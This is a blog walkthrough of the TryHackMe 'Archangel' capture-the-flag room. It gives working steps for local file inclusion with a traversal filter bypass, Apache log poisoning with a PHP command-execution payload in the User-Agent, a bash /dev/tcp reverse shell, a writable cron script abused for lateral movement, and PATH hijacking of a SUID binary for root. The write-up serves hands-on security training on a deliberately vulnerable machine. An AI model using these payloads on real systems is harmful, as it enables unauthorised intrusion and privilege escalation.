narancs's blog

TryHackMe – Archangel walkthrough

Introduction

TryHackMe Archangel room logo

Archangel is an easy difficulty room on TryHackMe. It is a boot2root machine, but there are some questions in the tasks that help us in the right direction.

Task 2 questions

  • Find a different hostname
  • Find flag 1
  • Look for a page under development
  • Find flag 2
  • Get a shell and find the user flag

Task 3 questions

  • Get User 2 flag
  • Root the machine and find the root flag

Task 2 - Get a shell

Find a different hostname

Nmap scan result:

I checked the website, and the answer for the first question is on the index page. The domain is in the email address in the upper right corner.

Find flag 1

Next, I added the found domain to /etc/hosts with the IP address of the machine. Then I opened the website in my browser using the new domain and a different website was shown. That is because the apache webserver is hosting different websites on different domains. (More info on this: How to Host Multiple Websites With One Apache Server)

This website displays the first flag:

Look for a page under development

Our next task is to find a page under development. We could use gobuster to enumerate pages on the website, but the page is actually included in the robots.txt file as a disallowed page. That is the answer for the 3rd question.

Page under development

Find flag 2

If we open that page we have found, we will see a button. After clicking it we are redirected to a different URL:

				
					http://***DOMAIN***.thm/***PAGE***?view=/var/www/html/development_testing/mrrobot.php
				
			

So the page under development accepts a URL parameter called view, and the contents of that file are displayed on the page. This smells like a file inclusion vulnerability.

However, if we try to include other files, e.g. /etc/passwd, we will get an error saying: ‘Sorry, Thats not allowed’. To understand the code logic that filters out certain inputs, we can use PHP wrappers to include the source code of the page as base64 encoded text, then decode it. Info on PHP wrappers that can be used for LFI/RFI: https://book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers
I used the php://filter/convert.base64-encode/ wrapper:
				
					http://***DOMAIN***.thm/***PAGE***?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/***PAGE***
				
			

This reveals the following base64 string:

				
					CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==
				
			

If we decode it from base64, we will get the source code of the page under development. The source code contains the answer for question 4 (‘Find flag’).

Get a shell and find the user flag

Checking for RCE
In the source code we can also see the logic that filters out certain inputs and shows the error message ‘Thats not allowed’.
  • The view parameter in the URL cannot contain the string ‘../..
  • The view parameter in the URL has to contain the string ‘/var/www/html/development_testing
The conditions are there to not allow path traversal like ‘/var/www/html/development_testing/../../../../../etc/passwd‘. But there is a flaw in this approach that we can easily bypass. We just need to use ‘.././..‘ instead of ‘../..‘.

To get a shell we can use the apache log file for RCE that is also described on the HackTricks website I linked earlier (Contents -> LFI2RCE -> Via Apache log file): https://book.hacktricks.xyz/pentesting-web/file-inclusion#via-apache-log-file

We need to be able to load the apache log file via LFI:

				
					http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log
				
			

It works. (This might not load or be very slow if you used gobuster or other enumeration tool on the site earlier, because that would cause the log to be really big. Restart the machine and try again. You will need to change the IP in/etc/hosts file.)

Exploiting the RCE vulnerability

Next step is to insert PHP code into the User-Agent field while sending a request to the website. I used BurpSuite to capture a request then sent it to the repeater and modified the User-Agent. This is the request:

				
					GET /test.php HTTP/1.1
Host: mafialive.thm
User-Agent: <?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
          *empty line*
          *empty line*

				
			

The HTTP request has to end with 2 empty lines as per the HTTP specification, otherwise the request will not be sent. If the request is sent successfully, then we can check if it works. Open the apache log file via file inclusion and add the additional query parameter in the URL that will be handled by the PHP code we inserted in the User-Agent header:

				
					http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php..//..//..//..//..//..//var//log//apache2//access.log&cmd=ifconfig
				
			

&cmd=ifconfig is appended to the URL, so the value of the cmd parameter is ‘ifconfig’. Then the PHP code we inserted in the User-Agent should execute the ifconfig command and we should see the output on the page. The source code of the page formats the output better as it preserves the white spaces, while HTML does not.

				
					10.11.56.129 - - [12/Jun/2022:20:30:38 +0530] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php..//..//..//..//..//..//var//log//apache2//access.log&cmd=ifconfig HTTP/1.1" 200 670 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.11.56.129 - - [12/Jun/2022:20:31:13 +0530] "GET /test.php HTTP/1.1" 200 436 "-" "eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 9001
        inet 10.10.129.206  netmask 255.255.0.0  broadcast 10.10.255.255
        inet6 fe80::c3:77ff:fef2:8da9  prefixlen 64  scopeid 0x20<link>
        ether 02:c3:77:f2:8d:a9  txqueuelen 1000  (Ethernet)
        RX packets 114  bytes 14974 (14.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 160  bytes 19741 (19.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 104  bytes 8556 (8.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 104  bytes 8556 (8.5 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 Gecko/20100101 Firefox/91.0"
10.11.56.129 - - [12/Jun/2022:20:31:17 +0530] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php..//..//..//..//..//..//var//log//apache2//access.log&cmd=ifconfig HTTP/1.1" 200 1031 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
				
			

We can now execute commands on the target. So we can just insert a bash reverse shell in the cmd parameter, start a listener and get a shell. Reverse shell:

				
					bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1
				
			

Shell opened:

				
					narancs@kali:~$ nc -lvnp 4444     
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.230.10.
Ncat: Connection from 10.10.230.10:53652.
/bin/sh: 0: can't access tty; job control turned off
$
				
			

There is only 1 user who has home directory and we can grab the user flag from there.

Task 3 - Root the machine

Get User 2 flag

We can see the there is a script in the crontab that gets executed every minute by archangel user.

				
					$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
*/1 *   * * *   archangel /opt/helloworld.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$
				
			

The file is writable by anyone so we can insert another reverse shell in the file, start another listener and will get a shell as archangel user in a minute. Once we are archangel, we can access the secret directory in /home/archangel. It contains the user 2 flag.

Root the machine and find the root flag

There is another interesting file in the secret directory. An executable named ‘backup’ that has the SUID bit set and is owned by root. When I tried to execute it I received an error:

				
					archangel@ubuntu:~/secret$ ./backup 
cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory
archangel@ubuntu:~/secret$
				
			

If we use the strings command on the file we can find the exact command that gets executed in the code.

				
					cp /home/user/archangel/myfiles/* /opt/backupfiles
				
			

The cp command is executed, but the absolute path of the command is not specified. We don’t need to specify paths for some commands is because of the $PATH variable. The PATH variable is an environment variable containing an ordered list of paths that Linux will search for executables when running a command.

This means that we can create our own executable file called cp in another directory, add that directory as the first entry in $PATH variable. We can write our own bash script in the new cp file, and when we run the backup SUID binary, our code will be executed as root.

				
					archangel@ubuntu:~/secret$ echo -e '#!/bin/bash\n/bin/bash' > /tmp/cp
archangel@ubuntu:~/secret$ chmod u+x /tmp/cp
archangel@ubuntu:~/secret$ export PATH=/tmp:$PATH
archangel@ubuntu:~/secret$ ./backup 
root@ubuntu:~/secret# 

				
			

We are now root. We can get the root flag from /root/root.txt.

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x